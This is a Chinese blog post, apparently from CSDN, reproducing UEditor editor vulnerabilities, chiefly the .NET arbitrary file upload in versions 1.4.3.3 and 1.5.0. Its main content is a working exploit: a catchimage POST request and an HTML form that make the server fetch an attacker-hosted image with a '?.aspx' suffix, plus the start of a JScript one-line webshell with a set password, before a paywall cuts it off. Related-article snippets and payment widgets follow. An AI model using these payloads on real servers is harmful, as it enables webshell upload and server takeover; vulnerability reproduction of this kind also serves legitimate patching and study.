UEditor漏洞

最新推荐文章于 2024-06-06 09:18:49 发布
最新推荐文章于 2024-06-06 09:18:49 发布
阅读量1.7w 收藏 16
点赞数 1
分类专栏: 编辑器漏洞 文章标签: UEditor漏洞 文件上传 SSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39101049/article/details/97684968
版权

UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。
github下载地址

1.文件上传漏洞

该任意文件上传漏洞存在于1.4.3.31.5.01.3.6版本中,并且只有**.NET**版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
在这里插入图片描述

ueditor中已经下架.net版本,但历史版本中可以下载1.4.3版本,但是否是1.4.3.3目前还没验证。

在这里插入图片描述

*该漏洞是由于上传文件时,使用的CrawlerHandler类未对文件类型进行检验,导致了任意文件上传。1.4.3.3和1.5.0版本利用方式稍有不同,1.4.3.3需要一个能正确解析的域名。而1.5.0用IP和普通域名都可以。*相对来说1.5.0版本更加容易触发此漏洞;而在1.4.3.3版本中攻击者需要提供一个正常的域名地址就可以绕过判断;

首先1.5.0版本进行测试,需要先在外网服务器上传一个图片木马,比如:1.jpg/1.gif/1.png都可以,下面x.x.x.x是外网服务器地址,source[]参数值改为图片木马地址,并在结尾加上“?.aspx”即可getshell,利用POC:

POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

在这里插入图片描述
复现成功会返回路径信息,可以看到木马已经成功被传上去了。

然后是1.4.3.3 .net版
本地构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data , 之前见到有poc指定了这个值。完整的poc如下”

<form action="http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell addr: <input type="text" name="source[]" /></p >

  <input type="submit" value="Submit" />

</form>

需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx
一句话木马:密码:hello

GIF89a
<script runat="server" language="JScript">
   function popup(str) {
   
       var q = "u";
       var w = "afe";
       var a = q + "ns" + w; var b= eval(str,a); return(
最低0.47元/天 解锁文章
2ed
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
编辑器漏洞
01-30 488
一 : php escapeshellcmd多字节编码漏洞解析及延伸 漏洞公告在http://www.sektioneins.de/advisories/SE-2008-03.txt PHP 5 <= 5.2.5 PHP 4 <= 4.4.8 一些允许如GBK,EUC-KR, SJIS等宽字节字符集的系统都可能受此影响,影响还是非常大的,国内的虚拟主机应该是通杀的,在测试完这个漏洞之后...
百度编辑器UEditor v1.4.3 PHP版 GBK
05-10
UEditor1.4.3更新说明修复hasContents接口在非ie下只有空格时判断还为真的问题 修复在粘贴word内容时,会误命中cm,pt这样的文本内容变成px的问题 优化删除编辑器再创建编辑器时,编辑器的容器id发生变化的问题 修复提交jsonp请求时,callback参数的xss漏洞 新增jsp后台多种服务器配置下的路径定位 修复ZeroClipboard的flash地址参数名称错误 修复getActionUrl的bug 整理配置参数,把遗漏在代码中的配置项整理到ueditor.config.js里 修复图片拉伸工具和编辑拉伸长高器的样式冲突 修复文字的unicod
网站漏洞修复之最新版本UEditor漏洞
热门推荐
网站安全专家
08-30 12万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文...
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
zz12345600354的博客
06-06 763
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 5019
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
UEditor编辑器两个版本任意文件上传漏洞分析
weixin_34009794的博客
12-30 970
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 ...
原创 | ueditor1.4.3-asmx绕过waf
qq_29437513的博客
07-24 2067
ueditor1.4.3-asmx绕过waf
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 6371
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6280
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
UEditor1.4.3.3的webshell漏洞攻击揭秘
主宰
10-09 1万+
前言 UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 漏洞利用 笔者本地测试的编辑器是...
ueditor漏洞修复
02-11
 Ueditor编辑器上传漏洞导致getshell  漏洞存在版本:1.4.3.3 Net版(目前最新版本,已停更) 二、修复文件 ueditor\net\App_Code\CrawlerHandler.cs 下载本附件,按上述路径覆盖文件即可。实测可用。
百度编辑器UEditor PHP版 v1.4.3
04-03
修复提交jsonp请求时,callback参数的xss漏洞 新增jsp后台多种服务器配置下的路径定位 修复ZeroClipboard的flash地址参数名称错误 修复getActionUrl的bug 整理配置参数,把遗漏在代码中的配置项整理到ueditor.config...
基于PHP的UEditor
07-15
UEditor是一款由百度开发的富文本编辑器,它具有功能丰富、性能稳定、易于定制等特点,广泛应用于Web内容编辑场景。将UEditor部署在PHP环境中,可以为用户提供一个便捷的在线文本编辑界面,实现图文混排、代码高亮、...
百度富文本编辑器ueditor1.4.3 JSP版本案例(上传图片)
10-13
ueditor1.4.3 富文本插件完美使用,搭建后可以直接上传图片以及多图片上传回显。主要的配置在config.json。可以查看官网ip,一般人出问题都是在config.json,或者不知道案例文件该怎么放,放哪里。
ueditor php 漏洞_ueditor 1.3.6和1.4.3版本文件上传漏洞复现
weixin_39830323的博客
12-01 1万+
最近遇到了两个版本的ueditor文件上传漏洞,因此记录一下。ueditor 1.3.6这个版本下的漏洞,是位于本地图片上传这个位置。使用谷歌浏览器复现的时候,要注意一个细节所以可以使用低版本的谷歌浏览器继续复现,也可以使用IE复现。通过网站技术分析插件Wappalyzer可知网站建站语言是php随便输入一个目录,根据报错可知网站中间件为apache另外,使用module模式与php结合...
UEditor 任意文件上传漏洞
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
Ueditor编辑器任意文件上传漏洞
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)
ueditor php漏洞
07-28
UEditor是一款非常流行的富文本编辑器,由百度开发并开源。在使用UEditor的过程中,可能会存在一些安全漏洞,主要包括以下几个方面: 1. 代码审计问题:在使用UEditor时,如果没有进行安全审计或者未按照最佳安全实践进行配置,可能会导致代码漏洞出现。攻击者可以利用这些漏洞进行远程代码执行、文件上传、路径遍历等攻击。 2. 文件上传漏洞UEditor提供了文件上传功能,但如果没有进行文件类型和大小等安全限制,攻击者可以上传恶意文件,如Web shell,从而获取服务器权限。 3. XSS攻击:UEDitor支持插入HTML代码和脚本,如果没有进行输入验证和过滤,就会存在跨站脚本攻击的风险。攻击者可以通过构造恶意脚本来盗取用户的敏感信息、劫持页面等。 为了解决这些漏洞问题,我们应该采取以下措施: 1. 更新到最新版本:百度团队定期修复漏洞并发布更新,我们应该及时更新UEDitor到最新版本,以获得最新的安全修复。 2. 禁用危险功能:根据实际需求,可以禁用UEDitor的某些功能,如文件上传功能,以减少漏洞发生的机会。 3. 输入验证和过滤:在接收用户输入时,应进行严格的输入验证和过滤,如限制文件类型和大小、对HTML代码进行转义等,以防止XSS注入攻击。 4. 安全配置:对UEditor进行安全配置,如限制上传文件路径、增加访问控制权限等,以加强整体安全性。 5. 漏洞监测和修复:持续进行安全审计,及时监测漏洞和修复,以保持系统的安全性。 总的来说,UEDitor是一款功能强大的富文本编辑器,但在使用过程中需要注意安全问题,采取相应的安全措施以保护系统和用户的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值